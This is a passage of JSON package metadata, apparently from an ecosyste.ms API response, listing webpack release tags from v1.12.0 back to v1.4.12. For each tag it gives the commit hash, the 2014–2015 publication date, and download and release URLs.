","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t